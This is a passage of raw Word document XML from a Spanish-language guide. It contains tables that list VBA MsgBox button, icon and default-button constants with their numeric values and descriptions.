      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Muestra los botones </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Aceptar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cancelar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. vbAbortRetryIgnore</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   2</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Muestra los botones </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Anular</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Reintentar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ignorar</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8452" w:type="dxa"/>
        <w:tblInd w:w="222" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2506"/>
        <w:gridCol w:w="728"/>
        <w:gridCol w:w="5218"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="286"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="236"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YesNoCancel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="14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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="8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los botones </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Sí</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Cancelar</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>.</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576"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YesNo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="14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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="8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los botones </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Sí</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="307"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="27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RetryCancel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="14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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="8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los botones </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Reintentar</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Cancelar</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="370"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="29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Alternativo*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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Valor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="57" w:firstLine="0"/>
              <w:jc w:val="center"/>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Función que realiza</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="301"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="26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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="17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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="80"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No muestra iconos.</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50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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="14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el icono </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Mensaje crítico</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">. </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44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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="86"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el icono </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Consulta de advertencia.</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266"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lastRenderedPageBreak/>
              <w:t>vbExclamation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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48</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="83"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el icono </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Mensaje de advertencia.</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30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Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="8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el icono </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Mensaje de información.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="369"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="29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Alternativo*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>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Valor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="57" w:firstLine="0"/>
              <w:jc w:val="center"/>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Función que realiza</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="301"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2258" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="13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DefaultButton1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="85"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El </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>primer botón</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> es el predeterminado.</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13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DefaultButton2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="8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256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="85"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El </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>segundo botón</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:i/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> es el predeterminado.</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13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DefaultButton3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="730" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="8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512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5464" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="83"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El </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:i/>
